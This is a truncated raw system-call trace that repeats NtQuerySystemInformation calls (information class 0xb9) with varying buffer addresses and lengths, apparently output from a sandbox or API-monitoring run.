NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x28, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0273.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0273.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0273.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0273.156] NtQuerySystemInformation 